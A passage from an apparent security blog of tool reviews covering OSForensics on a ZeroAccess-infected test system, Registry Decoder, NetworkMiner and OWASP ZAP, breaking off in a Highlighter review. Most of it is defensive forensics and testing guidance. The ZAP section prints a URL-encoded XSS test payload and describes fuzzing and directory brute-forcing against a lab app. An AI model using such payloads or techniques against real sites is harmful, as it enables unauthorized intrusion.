HolisticInfoSec

STOP SOPA!

2012-01-17T21:02:00.000-08:00

toolsmith: ZeroAccess analysis with OSForensics

2012-01-05T12:15:00.000-08:00

Prerequisites

Windows

Happy New Year:“A New Year's resolution is something that goes in one year and out the other.”- Author Unknown

Introduction

December is the time of year when I post the ToolsmithTool of the Year survey for reader’s to vote on their favorite tool of thegiven year. Please do take a moment to vote. What’snice is that I often receive inquiries from tool developers who would likeconsideration for coverage in toolsmith. David Wren, Managing Director, ofPassMark Software caught me at just the right moment as I was topic hunting forthis month’s column. PassMark, out of Sydney, Australia, has been known for benchmarkand diagnostic tools but has recently dipped its tow in the digital forensicspool with OSForensics. I givePassMark props for snappy marketing. OSForensics, “Digital Investigation for anew era” coupled with the triumvirate of Discover, Identify, and Manage makesfor a good pitch, but as always we need tools that do as they do, not as theysay. So what can we expect from OSForensics? According to David, who providedme with prerequisite vendor/developer content, the pending 1.1 release ofOSForensics expected in mid-January 2012 will include:

· Inclusion of a tree view style file systembrowser (Windows Explorer replacement).

· Indexing & searching of the contents ofE-mail attachments. At the moment just the E-mail content and the file names ofattachments are indexed.

· Improvements to add search results to a casedirectly from search history (efficiency improvement)

· Ability to add quick notes to a case. At themoment adding arbitrary notes is a 2 step process.

· Improvements in the built-in image viewer.Better quality image scaling & more file properties.

· Minor improvements in the way E-mails areexported

· Significant speed improvements in the window'sregistry browser

· A bug fix for handling of dates in Spanishlanguage E-mails.

· Some minor documentation changes

Existing features include disk imaging, disk imagemounting, raw hex view of disk, manualcarving, a registry viewer, forensic copy of network files, testing &zeroing of external drives prior to imaging, file hashing, live memory dumping,detection of files with wrong extensions via signatures, case management,reporting, 64bit support, and more.

The OSForensics website has an extensive FAQ as wellexcellent videos and tutorials.

Please note that there is a Free Edition and a ProEdition. For this article I tested the 1.0 Pro version of OSForensics.

Integratingadditional tools into OSForensics

One of the things I like most about OSForensics is theability to plug in other tools. There’s a great tutorial for enhancingOSForensics with Harlan Carvey’s RegRipper thatwill give you a solid starting point for this activity. Friend and reader JeffC. expressed interest in rootkit analysis this month so I’m going to use thisopportunity to integrate GMER andRootkitRevealer into OSForensics.

As I ran OSForensics on a Windows XP system from a USBkey, I copied GMER and RootkitRevealer to E:\OSForensics\AppData\SysInfoTools.

I then navigated to SystemInformation in the OSForensics UI, selected Add List and created a Rootkit Analysis list, followed Add under Commands and added the command to execute GMER andRootkitRevealer as seen in Figure 1.

Figure 1: Rootkit Analysis tools added

Keep in mind, you can add any of your preferred tools toOSForensics and their execution as well as their output will be captured aspart of OSForensics case management capabilities.

RunningOSForensics

For ease of viewing, right-click the menu on the leftside of the OSForensics UI and choose thin buttons as this will present alloptions without scrolling.

One note of interest before diving in: OSForensics allowsinstallation on a base analysis system from which you can then Install to USB so as to run it from aUSB key as part of your field kit as seen in Figure 2.

Figure 2: Install OSForensics to a USB key

Jeff, as part of his expressed interest in rootkitanalysis, also provided me with a perfect sample with which to compromise mytest system. Nomenclature for this little nugget includes Jorik and Sirefef butyou may now it best as Zaccess or ZeroAccess. To read a truly in-depth study ofZeroAccess, check out Giuseppe Bonfa’s fine work in four parts over at InfosecResources, aswell as a recent update from Pedro Bueno on the ISC Diary.ZeroAccess has been rolled into the BlackHole Exploit Kit and is often used incrimeware bundles for ad clicking.

This particular sample (MD5: 3E6963E23A65A38C5D565073816E6BDC)is VMWare-aware so I targeted my Windows XP SP 3 system running Windows SteadyState and executed QuickTimeUpdate.exe(it only plays a real QuickTime update on TV).

As with any tool of OSForensic’s ilk, I started theprocess by creating a case which is as easy clicking Start then CreateCase. The OSForensics UI is insanely intuitive and simple; if you’re oneof those who refuses to read manuals, FAQs, and/or tutorials you’ll still getunderway in short order. With most forensics oriented multi-functional toolsthat include indexing I always make indexing my second process. Yep, it’s aseasy as Create Index. I infectedthis system on 12/26/11 at 1630 hours so a great next step for me was to reviewRecent Activity to see what wasnoteworthy. Based on a date range-limited search under Recent Activity I noted a significant spike in events inthe 1600 hour. I right-clicked on the resulting histogram for the hour ofinterest and selected Show these files.The result, as seen in Figure 3, shows all the cookies spawned when ZeroAccesstapped into all its preferred ad channels. All cookies in Figure 3, includingthose for switchadhub.com, demdex.com, and displayadfeed.com were created righton the heels of the infection at 1630 hours. These are services malware writersuse to track clicks and campaign success.

Figure 3: ZeroAccess’ malicious click campaign evidence via OSForensics

I had not browsed to any websites and on this host wouldhave done so via a browser other than Internet Explorer; as such this activity aswritten to C:\Documents andSettings\LocalService\LocalSettings\Temporary Internet Files\Content.IE5clearly occurred in the background.

I always take a network capture during malware runtimeand the resulting PCAP acquired while analyzing this version of ZeroAccessincluded connections to a well-known malware redirection service at 67.201.62.*.Search "67.201.62" malwareand you’ll see what I mean.

I then opted to call GMER from OSForensics as discussedearlier during Integration. Ifyou’re not familiar GMER is the defacto standard for rootkit detection. Once aGMER scan is complete, you can choose to dump detected modules as seen inFigure 4 via Dump module.

Figure 4: GMER bags ZeroAccess via OSForensics

I fed the resulting binary file to VirusTotal and wasrewarded for my efforts with hits for Gen:Variant.Sirefef.38,a ZeroAccess variant.

OSForensics features a MemoryViewer from which you can conduct similar activity natively by selectinga given process (one you assume or have determined is malicious), select one offour dump options including Dump ProcessMemory Contents, then click Dump.The resulting .bin can be fed to VirusTotal or a similar service.

But alas, you will not have made the utmost use of OSForensicsif you don’t capitalize on Hash Sets.I won’t get into great detail as to how to do so as again the tutorial videosare excellent. You will want to enable a given hash set by selecting it in theUI then clicking Make Active.One of the hash sets PassMark offers via download is a 124kb common Keyloggershash set. Youcan select a directory via File NameSearch, then Search, thenright-click a file of interest (or CTRL-A to select all) and choose Look Up in Hash Set. As none of theacquired binaries for ZeroAccess matched the current hash set, I chose to scanmy Lurid (theAPT) analysis folder to see what matches the hash set had for me. I used the Sorting menu in the lower right-handcorner of the UI and set it to In HashSets; the results are seen Figure 5.

Figure 5: Keylogger hashset checks

While OSForensics claimed to have matches, they were onlyfor 0 byte files that all show up with the MD5 hash of D41D8CD98F00B204E9800998ECF8427E.I’ll test this further with a known keylogger and determine what a real matchlooks like. I don’t fault OSForensics for this as I likely don’t have a samplekeylogger whose hash matched the hash set. Trying hash matching against knowngood system files worked admirably.

I didn’t even touch OSForensics password analysiscapabilities but will also likely do so in a future blog post. Do check outthat feature set via Passwordsfor yourself and share your feedback. Recognize that OSForensics integratesRainbow Tables so as you can imagine, the possibilities are endless.

Don’t forget the expected disk image analysiscapabilities coupled with file carving. I tested this briefly (andsuccessfully) only to confirm what I consider a required and standard featurefor tools of this nature.

In Conclusion

I’ll admit I had no expectations for OSForensics as I hadno prior experience with it and to be quite candid, no awareness prior to Davidcontacting me. I always assume some risk when choosing such a tool given that Icould spend hours conducting research and analysis only to find the tool doesnot meet the standard for toolsmith discussion (can you say emergency topicchange?”). Such was not the case withOSForensics. I was pleased with the results, disappointed I didn’t have moretime to spend on it before writing about it here, but looking forward makingmuch more use of it in the future. As always, let me know what you think, I’mhopeful you find it as intriguing as I have.

Ping me via email if you have questions (russ atholisticinfosec dot org).

Cheers…until next month.

Acknowledgements

DavidWren, Managing Director, PassMark Software

Choose the 2011 Toolsmith Tool of the Year

2011-12-20T10:08:00.000-08:00

Merry Christmas and Happy New Year!
It's that time again.
Please vote below to choose the best of 2011, the 2011 Toolsmith Tool of the Year.
We covered some outstanding information security-related tools in ISSA Journal's toolsmith during 2011; which one do you believe is the best?
I appreciate you taking the time to make your choice.
You can review all 2011 articles here for a refresher on any if the tools listed in the survey.
You can vote through January 31, 2012.
Results will be announced February 1, 2012.

toolsmith: Registry Decoder

2011-12-02T23:28:00.001-08:00

Prerequisites

Binaries require no external dependencies; working from asource checkout requires Python 2.6.x or 2.7.x and additional third-party appsand libraries.

Merry Christmas:"Christmas is not a time nor aseason, but a state of mind. To cherish peace and goodwill, to be plenteous inmercy, is to have the real spirit of Christmas.” -Calvin Coolidge

Introduction

Readers of the SANS Computer Forensics Blog orHarlan Carvey’s Windows Incident Response bloghave likely caught wind of Registry Decoder. Harlaneven went so far as to say “sounds like development is really ripping along (nopun intended). If you do any analysis of Windows systems and you haven't lookedat this tool as a resource, what's wrong with you?” When Registry Decoder was firstreleased in September 2011, I spotted it via Team Cymru’s Dragon News Bytesmailing list and filed it away for future use. Then, in most fortuitousfashion, Andrew Case, one of the Volatility developers I’d reached out to forSeptember’s Volatility column, contacted me regarding Registry Decoder in earlyNovember. Andrew co-develops Registry Decoder with Lodovico Marziale as part ofDigital Forensic Solutions and kindly provided me with content for theremaining entirety of this introduction.

Registry Decoder is open source (GPL) and writtencompletely in Python and is downloadable via Google Code projects. It wasinitially funded by the National Institute of Justice and now is funded byDigital Forensics Solutions.

Registry Decoder was devised to automate the acquisition,analysis, and reporting of registry contents. To accomplish this, there areactually two projects. The first is RegistryDecoder Live which allows for the safe acquisition of registry files from alive machine by forcing a system restore point, thus putting the currentlyactive registry files into a read-only state in backup. It then reads thesefiles from backup either in System Restore Points for XP or from the VolumeShadow Service on Windows Vista & Windows 7. As Registry Decoder Live acquiresfiles, it creates a database that can then be imported into the second tool, Registry Decoder.

Registry Decoder can analyze registry files from a numberof sources and then provide a number of GUI-driven analysis capabilities. Thecurrent version of the tool (1.1 as this is written) can import individualregistry files, raw (dd) disk images, raw (dd) split images, Encase (E01)images, and databases from the live tool. Once evidence is imported andpre-processed, the investigator then has a number of analysis tools availableand new evidence can be added to a case at any time.

Registry Decoder’s analysis capabilities include:

· Browsing Hives (similar to Access Data’sRegistry Viewer)

· Hive Searching (more on this below)

· Plugin System (similar to regripper)

· Hive Differencing

· Timelining based on last write time

· Path Based Analysis

· Automated reporting of all of the above

Registry Decoder automates all of this functionality forany number of registry hives and the reporting can handle exporting resultsfrom multiple hives and analysis types into one report.

Andrew’s favorite Registry Decoder use case is USBSTORanalysis. Almost every case involving investigating a specific employee requiresdetermining which (if any) USB drives were in use. To do this with Registry Decoder, all aninvestigator has to do is create a case with the disk images or hives acquired,run the USBSTOR plugin, and thenexport the results. After pre-processing is done, it takes mere minutes to havea report created with the device name, serial number, etc. of any devicesconnected. Also, since Registry Decoder pulls historical files from livemachines and disk images (System Restore & Volume Shadow Service), thisanalysis can be run across hives going back months or years.

Similarly, while investigating data exfiltration betweenmultiple employees of a company, Andrew needed to know if they shared USBdrives. To make the determination he took the SYSTEM files from each machine,loaded them into Registry Decoder and then used the plugin differencing abilityon the USBSTOR plugin. Itimmediately revealed what drives were shared between computers, including theirserial number. Another common use of thedifferencing feature is with the Servicesplugin as this quickly identifies malware if you difference your known gooddisk image vs. a disk image of a machine suspected to be infected.

Registry Decoder’s search feature is one of its strongestfeatures. It allows you to search across any number of hives and filter bykeys/values/names, last write time range, wildcard searching, and bulksearching with keyword files.

For a recent case, Andrew had to determine if a personwas accessing files they shouldn’t have been looking at. They had a desktop anda laptop, both running XP and both with many System Restore Points. In lessthan 30 minutes with Registry Decoder, Andrew needed only load the disk imagesfrom the two machines into Registry Decoder, make a text file with all thesearch terms, and then search all the terms across all the hives in the case(including historical ones). This returned results that he then exported intoone report and was finished. Another usefulsearch is noted when viewing the search results tab, right click on any result,and immediately jump into the Browseview positioned at that key.

Another good use case includes path-based analysis whichallows you to determine if a registry path exists in any number of files. For whicheverfiles it is present in, one can then export the path and optionally itskey/value pairs. This is extremely useful in two situations:

1. Determiningif certain software is installed (P2P, cracked software, etc.), as you can simplysearch any of the paths that the program creates and then export its key/valuesinclusive of when and where the software was installed.

2. Duringmalware analysis as most malware writes to the registry. Searching across numeroussuspect systems for the malware’s path allows investigators to immediately determinethe extent of infection.

Registry Decoder’s roadmap includes more analysis pluginsand added support for memory analysis (integrate with Volatility’s existingin-memory registry functionality).

The developers also want to add support for analyzingpreviously deleted keys and name/value pairs within hives. The library utilizedfor enumerating hives, reglookup,already supports this functionality so it is just a matter of integration.

Running theRegistry Decoder online acquisition component

I ran regdecoderlive32 on a 32bit Windows XP SP3 virtualmachine infected with Lurid and regdecoderlive64 on a Windows 7 SP1 64bitmachine.

One note for regdecoderlive32 on Windows XP systems with drivesformatted with NTFS. Even when running regdecoderlive32 with administratorprivileges the hidden System Volume Information directory is protected withunique ACLs. To circumvent this issue, issue cacls"C:\System Volume Information" /E /G :F from acommand prompt at the root of C: (this assumes the OS is installed on C:).

As seen in Figure 1, running regdecoderlive is as simpleas executing and defining a few parameters including description, outputdirectory (must be empty) and check boxes for acquisition of current and backupfiles.

Figure1: Registry Decoder Live

Once acquisition is complete, the results directory willbe populated with registryfiles/acquire_files.dband related files. This results directory can (should) be written to portablestorage mounted on the target system or a network share, which can then beconsumed by Registry Decoder for offline analysis.

Running theRegistry Decoder offline analysis component

Registry Decoder can consume individual registry files,raw (dd) disk images, and Encase (E01) images, including split images. Buildinga case is as easy as adding a case name and number, investigator, comments, andcase directory. Adding evidence to a case after initial processing is createdis quite simple; you’ll be prompted to add new evidence after choosing Start Case and opening an existingcase.

I only tested RegistryDecoder with the acquisition database acquired from a Lurid-infected Windows XPVM via Registry Decoder Live.

Initial processing can takesome time depending on the number of restore points or volume shadows.

Once initial processing iscomplete however, Registry Decoder is nimble and effective.

I mimicked some of Andrew’suse cases in this analysis of a Lurid victim. From runtime analysis of the Lurid sample I had (md5: 84d24967cb5cbacf4052a3001692dd54)I knew a few key attributes to test Registry Decoder with. Services andregistry keys created include WmdmPmSp.As the search functionality is a strong suit, I selected CORE from the currentsnapshot acquired and searched WmdmPmSp. Right-click search results andselect Switch to File View thennavigate to the Browser tab forkey values, etc. as seen in Figure 2.

Figure 2: Registry Decoder search results

I made use of the timelinefunctionality and was amply rewarded. Imagine a scenario where have a ballparktime window for a malware compromise or unauthorized access. You can filter thetimeline window accordingly and produce output that is compliant to theSleuthKit’s mactime format. It’s not human readable currently (next release) soread it in with Autopsy or TSK. Timeline gathering and results are combined inFigure 3. It clearly identified exactly when Lurid wrote to HKLM\SYSTEM\CONTROLSET001\SERVICES\WmdmPmSp.

Figure 3: Registry Decoder timeline results

I also tested USBSTOR (unrelated to Lurid) on both acquisitions(Windows 7 and Windows XP) and the results were accurate and immediate in bothcases as seen Figure 4.

Figure 4: Registry Decoder USBSTOR results

Explore the Plugins optionsincluded with Registry Decoder, the possibilities are endless. SYSTEM willprovide you a nice summary overview as you begin, IE Typed URLs is great forinappropriate browser use, Services with Perform Diff enabled is excellent formalware hunting, System Runs will give you instant gratification regardingwhat’s configured to run on startup, ACMRU queries the registry keys that havebeen typed into the Windows Search dialog box, and on and on and on. JBrilliant!

In Conclusion

I’m extremely excited about this tool and imagining itsuse at scale to be of incredible use for enterprise incident responders andforensic examiners. I’ve been chatting with Andrew at length while writing thisand he continuously mentions pending features including some visualizationoptions and the aforementioned Volatility interaction. I can’t wait; check outRegistry Decoder out for yourself ASAP.

Merry Christmas!

Ping me via email if you have questions (russ atholisticinfosec dot org).

Cheers…until next month.

Acknowledgements

Andrew Case, Registry Decoderdeveloper and project lead

Tool review: NetworkMiner Professional 1.2

2011-11-26T13:01:00.001-08:00

I've been slow in undertaking this review as NetworkMiner's Erik Hjelmvik sent me NetworkMiner Professional 1.1 when it was released and 1.2 is now available.

Seeing Richard Bejtlich's discussion of Pro 1.2 has served to get me off the schnide and is helpful as I will point you to his post as an ideal primer while I go into to a bit deeper detail as to some of NetworkMiner's power as well as what distinguishes Professional from the free edition.

I covered NetworkMiner in toolsmith in August 2008 back when it was version 0.84. Erik has accomplished all of his goals for improvement as identified in the article including reporting, faster parsing of large PCAP files (.735 MB/s at the command-line), more protocols implemented, and PIPI (Port Independent Protocol Identification). NetworkMiner Professional 1.2 incorporates all of the above.

To exemplify NetworkMiner Professional's PIPI capabilities, I changed my lab web server port to 6667, then set NetworkMiner to grab a live capture while browsing to the reconfigured server.

Note: you need to Run as Administrator to grab the interface on Windows 7.

Sure, it's more likely that someone would be more likely to hide evil traffic over port 80 but you get the point. As Richard said, "PIPI has many security implications for discovery and (preferably) denial of covert channels, back doors, and other policy-violating channels."

Note as seen in Figure 1 that NetworkMiner Professional clearly differentiates HTTP traffic regardless of the fact that it traversed port 6667.

Figure 1

I was a bit surprised to note that the Hosts view as seen in Figure 1 did not identify that any data was pushed as cleartext although it unequivocally identified the admin/password combination I sent in both the Cleartext view and the Credentials view.

I used an 18.8MB PCAP from the Xplico sample set as it includes a plethora of protocols and carve-able content with which to test NetworkMiner Professional.

Exporting results to CSV for reporting is as easy as File --> Export to CSV and selecting output of your choosing. As seen in Figure 2 I opted for Messages as NetworkMiner Professional cleanly carved out an MSN to Yahoo email session (HTTPS, anyone?).

Figure 2

Geo IP localization is a real standout too. You'll see it in play as you explore host details in Hosts view as seen in Figure 3.

Figure 3

You may find host coloring useful too should you wish to tag hosts for easy identification later as seen in Figure 4.

Figure 4

Finally, I am most excited about NetworkMinerCLI for command-line scripting support.

I ran a PCAP taken from a VM infected with Trojan-Downloader.Win32.Banload.MC through NetworkMinerCLI and was amply rewarded for my efforts...right after I excluded the output directory from AV detection.

Figure 5 shows the command executed at the prompt coupled with the resulting assembled files and CSVs populated to the output directory as seen via Windows Explorer.

Figure 5

The assembled files included all the malicious binaries disguised as JPGs as downloaded from the evil server. File carving network forensic analysis juju with easy CLI scripting. Bonus!

In closing, NetworkMiner Professional 1.2 is a mature, highly useful tool and well worthy of consideration for purchase by investigators and analysts tasked with NFAT activity.

I'm glad to provide further feedback via email and recommend you reach out to Erik as well via info [at] netresec.com if you have questions.

toolsmith: OWASP ZAP - Zed Attack Proxy

2011-11-02T21:52:00.000-07:00

Prerequisites

Java Runtime Environment

ZAP runs on Linux, Mac OS X, and Windows

HappyThanksgiving: "As we express ourgratitude, we must never forget that the highest appreciation is not to utterwords, but to live by them." -JFK

Introduction

November 2011’s toolsmith is the 61^st in theseries for the ISSA Journal, thus marking five years of extensive toolsanalysis for information security practitioners. Thank you for coming along forthe ride.

Fresh on the heels of a successful presentation on OWASPTop 10 Tools and Tactics at an even more successful ISSA International inBaltimore I was motivated to give full coverage this month to the OWASP ZedAttack Proxy, better known as ZAP. I had presented ZAP as a tool of choice whenassessing OWASP Top Ten A1 – Injection but, as so many of the tools discussed,ZAP delivers plenty of additional functionality worthy of in-depth discussion.

OWASP ZAP is a fork of the once favored Paros Proxy,which has not been updated since August 2006. As such, it should be noted withno small irony that we covered Paros in December 2006; this is an excellentopportunity to show you how far ZAP has come from the original project.

ZAP is the result of Simon Bennetts’ (Psiinon) hard work,though he’s got help from co-lead Axel Neumann (@a_c_neumann) and manycontributors.

As an official OWASP project, ZAP enjoys extensive useand development support as an “easy to use integrated penetration testing toolfor finding vulnerabilities in web applications.”

Simon offered a veritable plethora of feedback for thisarticle, as provided throughout the rest of the introduction. He indicated thathe originally released ZAP specifically for developers and functional testers;a group which he believes is poorly represented in the security tools market.

Ease of use was a prime concern, as was documentation andto his surprise it turned out that it was the security folk who took up ZAP thequickest, providing great feedback, reporting issues and asking for lots ofenhancements. Simon still wants ZAP to be ideal for people new to web applicationsecurity but it’s also going to be enhanced with more and more advancedfeatures aimed at profession penetration testers.

Simon also wanted ZAP to be a community project; thereare many open source security tools that are tightly controlled by oneindividual or company. While he doesn’t have a problem with that fact he does believethat the real strength of open source comes when anyone can contribute to aproject and take it in directions its initial developers never envisaged.

Anyone and everyone is welcome to contribute to ZAP, andnot necessarily coding only; they welcome help with testing, documentation,localization, issues identification and enhancement requests. Help spread theword as well via articles, reviews, videos, blogs, Twitter, etc.

ZAP is also one of the few open source security tools tobe fully internationalized. It has been translated into 10 languages and downloadstatistics indicate that approximately half of the ZAP users worldwide arelikely to be non-native English speakers.

ZAP is intended to provide everything that you need toperform a penetration test on a web application.

If you are new to web application security then it mightbe the only security tool you need. However, if you're an experiencedpenetration tester be sure to include it as one of the many tools in yourtoolbox.

As a result, the development team is trying to make it aseasy as possible to integrate ZAP with other tools. They provide a way toinvoke other applications from within ZAP passing across the current context.In version 1.3 they introduced an API which allows the core ZAP functionalityto be invoked by a REST API, and will be extended to cover even more of ZAP'sfeatures in future releases.

This is an ideal way for other applications to directlydrive ZAP, and can be used when ZAP is running in 'headless' mode (i.e. withoutthe UI).

They've also put together a POC showing how ZAP can beused by developers to include basic security tests in their continuousintegration framework and be alerted to potential security vulnerabilitieswithin hours of checking code.

Simon and team don’t believe in reinventing the wheel,which is why they always seek high quality open source components to reusebefore implementing a new feature from scratch.

As such, the brute force/forced browsing support isprovided via DirBuster andfuzzing makes use of the JBroFuzz libraries (both OWASP projects).

Amongst the more advanced features that users might notbe aware of is that ZAP keeps track of all of the anti-CSRF tokens it finds. Iffuzzing a form with an anti CSRF-token in it, ZAP can regenerate the token foreach of the payloads you fuzz with. There’s also an experimental option thatallows this to be turned on when using the active scanner as well. I can saythat quality CSRF testing is not commonplace among ZAP’s web applicationtesting contemporaries.

For ZAP version 1.4 the development team has decided tofocus on:

· Improving the active and passive scanners

· Improving stability (especially for large sites)

· Session token analysis

In July 2011 ZAP was evaluated and designated as a'stable' OWASP project, the highest level currently available. Further, OWASPprojects are now being restructured; ZAP has been designated as one of thesmall number of 'flagship' projects.

Rightfully so; thank you Simon.

Let’s run ZAP through its paces.

ZAP Installationand Configuration

ZAP is installation is very simple. Once unpacked on yourpreferred platform, invoke ZAP from the application icon or at the commandprompt via the appropriate executable. A current Java Runtime Environment is arequirement as all the executables (EXE, BAT, SH) invoke java –jar zap.jar org.zaproxy.xap.ZAP.

Most importantly ZAP, runs as a proxy. Configure yourpreferred browser to proxy via localhost and the default port of 8080. I changethe port to 8088 to avoid conflict with other proxies and services. You canchange the port under Tools àOptions àLocal proxy if you run multiple proxies that you bounce between duringassessments. I do and as such I use the Firefox add-on FoxyProxy to quicklydial in my proxy of choice.

You must also generate an SSL certificate in order to useand test SSL enabled sites. You will be prompted to do when running ZAP for thefirst time.

ZAP Use

In addition to the aforementioned Security RegressionTests for developers, the OWASP ZAP project offers ZAP Web ApplicationVulnerability Examples, or ZAP WAVE. Download it and drop zap-wave.war in the webapps directoryof your favorite servlet engine. On Debian/Ubuntu systems sudo apt-get install tomcat6 will getyou in business with said servlet engine quickly. In addition to a LAMP stackon an Ubuntu 11.10 VM I run Tomcat for just such occasions. OWASP WebGoat alsoruns as a standalone test bed or via a servlet engine.

Enable ZAP, with your browser configured to proxy throughit, then navigate to the system (VM or real steel) hosting ZAP WAVE, usually onport 8080. As an example: http://192.168.140.137:8080/zapwave/.

ZAP WAVE includes “active” vulnerabilities such ascross-site scripting and SQL injection as well as “passive” vulnerabilitiesincluding three types of information leakage and two session vulnerabilities.

There are also pending false positives that are not yetready for primetime.

The developers recommend that you explore the target appwith ZAP enabled as a proxy, and touch as much of it as possible beforespidering. Doing so helps ZAP find more vulns as you may cross paths with errormessages, etc.

I typically visit the root of the application hierarchyfor a web application I wish to assess, right-click on it, select Attack, then Spider site. This crawls the entire site hierarchy andpopulates the tree view under the Sites tab in ZAP’s left pane as seen inFigure 1.

Figure 1: ZAP spidering

Crawling/spidering can have unintended side-effects on anapplication, even adding or deleting records in a database, so be advised.

A good crawl ensures a better active scan, but beforebeginning a scan, set your Scan Policy via Analyzeà Scan Policy as seen in Figure 2. You may wish to morenarrowly scope your scan activity to just the likes of information gathering orSQL injection as seen in Figure 2.

Figure 2: ZAP scan policy

Spidering and scan policyconfiguration complete, right click the root, or a specific node you wish toassess as you can choose Attack à Active scansite or Attack à Active scannode.

You can also exclude a sitefrom the scope in a similar fashion.

A full scan of the ZAP WAVEinstance completed in very short order; results were immediate as seen inFigure 3.

Figure 3: ZAP scan results

ZAP includes the expectedEncode/Decode/Hash functionality via Edità Encode/Decode/Hash or Toolsà Encode/Decode/Hash along with a manual editor for generating manual requests. I’ll oftenrun ZAP for nothing more than encoding, decoding, and hashing; it’s a greatutility.

The Port Scan feature is also useful. It will select the in-scope hostby default; just click the Port Scan tab then the start button.

The Brute Force tab is a function of the above-mentioned DirBustercomponent and includes seven dictionary lists to choose from. I ran thisagainst my full host VM rather just the servlet element and included thedictionary-list-1.0 dictionary for a simple, quick test.

Figure 4: ZAP DirBuster at work

One of my favorite ZAP features(there are many) is the Fuzzer. Per the Fuzzer component guidance:

· Selecta request in the Sites or History tab

· Highlightthe string you wish to fuzz in the Request tab

· Rightclick in the Request tab and select 'Fuzz...'

· Selectthe Fuzz Category and one or more Fuzzers

· Pressthe Fuzz button

· Theresults listed in the Fuzzer tab - select them to see the full requests andresponses.

The fuzzer, like the scanner,includes functionality which causes ZAP to automatically regenerate the tokenswhen required

I ran Fuzzer against http://192.168.140.137:8080/zapwave/active/xss/xss-form-anti-csrf.jspand fuzzed the anticsrf and name variables as it is a recentaddition per the ZAP WAVE download site.

As seen in Figure 5, thefuzzer offers a wider array fuzzers within a given category.

FIGURE 5: ZAP fuzzer config

In the understanding thatfuzzing is the art of submitting a great deal of invalid or unexpected data toa target, you can look for variations in results such as response code (200 OK)and response times. Where normal response times per request average between 2msand 4ms for ZAP WAVE hosted on a local VM, one request in particular stood out ata 402ms response time. I checked for the string passed and cracked up.

%3CIMG+SRC%3D%60javascript%3Aalert%28%22RSnake+says%23%23%23+%27XSS%27%22%29%60%3E

Or,courtesy of the handy ZAP decoder:

Mr. Slowloris HTTP DoS himselfcausing grind even here. ;-)

In Conclusion

ZAP deserves its status as an OWASP flagship project.Whether you’re a seasoned veteran or new to the web application security gamemake the Zed Attack Proxy part of your arsenal. I’d go so far as to say, as2011 is winding down, that ZAP feels like a likely front runner for 2011Toolsmith Tool of the Year. But that is for you to decide, dear reader. Let meknow if you agree.

Ping me via email if you have questions (russ atholisticinfosec dot org).

Cheers…until next month.

Acknowledgements

Simon Bennetts (Psiinon) forproject feedback and details

Axel Neumann (@a_c_neumann)for draft review

Presenting OWASP Top 10 Tools & Tactics at ISSA International

2011-10-15T15:39:00.000-07:00

The ISSA International Conference is coming up this week in Baltimore; I'll be presenting OWASP Top 10 Tools and Tactics based on work for the InfoSecInstitute article of the same name.
If you're in Baltimore and planning to attend, stop by Friday, October 21 at 2:20pm in Room 304.
I'll be discussing and demonstrating tools such as Burp Suite, Tamper Data, ZAP, Samurai WTF, Watobo, Watcher, Nikto, and others as well as tactics for their use as part of SDL/SDLC best practices.

If you’ve spent any time defending web applications as a security analyst, or perhaps as a developer seeking to adhere to SDLC practices, you have likely utilized or referenced the OWASP Top 10. Intended first as an awareness mechanism, the Top 10 covers the most critical web application security flaws via consensus reached by a global consortium of application security experts. The OWASP Top 10 promotes managing risk in addition to awareness training, application testing, and remediation. To manage such risk, application security practitioners and developers need an appropriate tool kit. This presentation will explore tooling, tactics, analysis, and mitigation.

Hope to see you there.

Cheers.

toolsmith: Log Analysis with Highlighter

2011-10-04T08:04:00.000-07:00

Reprinted with permission for the author only from the October 2011 ISSA Journal.

Prerequisites

Windows operating system (32-bit & 64-bit)
.NET Framework (2.0 or greater)

Introduction

Readers may recall coverage of Mandiant tools in prior toolsmiths including Red Curtain in December 2007 and Memoryze with Audit Viewer in February 2009.
Mandiant recently released Highlighter 1.1.3, a log file analysis tool that provides a graphical component to log analysis designed to help the analyst identify patterns. “Highlighter also provides a number of features aimed at providing the analyst with mechanisms to discern relevant data from irrelevant data.”
I’m always interested in enhanced log review methodology and have much log content to test Highlighter on; a variety of discovery scenarios proved out well with Highlighter.
As a free utility designed primarily for security analysts and system administrators, Highlighter offers three views of the log data during analysis:
Text view: allows users to highlight interesting keywords and filter out “known good” content
Graphical, full-content view: shows all content and the full structure of the file, rendered as an image that is dynamically editable through the user interface
Histogram view: displays patterns in the file over time where usage patterns become visually apparent and provide the examiner with useful metadata otherwise not available in other text viewers/editors
I reached out Jed Mitten, project developer along with Jason Luttgens, for more Highlighter details. Highlighter 1.0 was first released at DC3 in St. Louis in '09 with nearly all features and UI driven by internal (i.e., Mandiant) feedback. That said, for version 1.1.3 they recently got some great help from Mandiant Forum user "youngba" who submitted several bug reports and helped us one bug fix that we could not reproduce on our own. Jason and Jed work closely to provide a look and feel that is as useful as their free time allows (Highlighter is developed almost exclusively in their off hours).
Nothing better than volunteer projects with strong community support; how better to jointly defend ourselves and those we’re charged with protecting?
Jed describes his use of Highlighter as fairly mundane wherein he uses it to investigate event logs (Windows events and others), text output from memory dumps (specifically, ASCII output from memory images), and as one of his favorite large-file readers. As a large-file reader Highlighter reads from disk as-needed making it a great tool for viewing multi-hundred-MB files that often often choke the likes of Notepad, NP++, and others. I will be candid and disclose that I compared Highlighter against the commercial TextPad.
Another use case for Jed includes using the highlight feature to find an initial malicious IP address in an IIS log, determine the files the attacker is abusing, then discovering additional previously unknown evil-doers by observing the highlight overview pane (on the right).
Jed indicates that the success stories that make him proudest come from other users. He loves teaching a class and having the students tell him how they are using Highlighter, and how they would like to see it evolve. With the user community starting to pick up a Jed considers that a pretty big success as well.
As per the development roadmap, development of Highlighter is very strongly driven by the user community. Both Jason and Jed work a great many hours finding evil (Jason) and wreaking havoc (Jed) in customer systems. That said, their ability to work on Highlighter does not match their desire to do so. Future hopes for implementation include multi-document highlighting (one highlight set for multiple documents). They would also like to see one of two things happen:
1) Implement binary reading, arbitrary date formats, arbitrary log formats; or
2) Implement/integrate a framework to allow the community to develop such plugins to affect various aspects of Highlighter. Unfortunately, they have big dreams and somewhat less time but they’re very good at responding to Bug Reports at https://forums.mandiant.com.
Finally, Jed stated that they aren't going to open source Highlighter anytime soon but that they do want the user community to driving its development. You heard it here, readers! Help the Mandiant Forums go nuts with bug reports, feature requests, use cases, success stories, etc! They’ve been concerned that it's been difficult to motivate users to submit on the Forum; perhaps user’s work is too s sensitive or Highlighter is so simple it doesn't really require a lot of question/answers, but Jed considers both of those as wins.

Highlighter

Installation is as simple as executing MandiantHighlighter1.1.3.msi and accepting default configuration settings.
Pattern recognition is the fundamental premise at the core of Highlighter use and, as defined by its name, highlights interesting facets of the data while aiding in filtering and reduction.
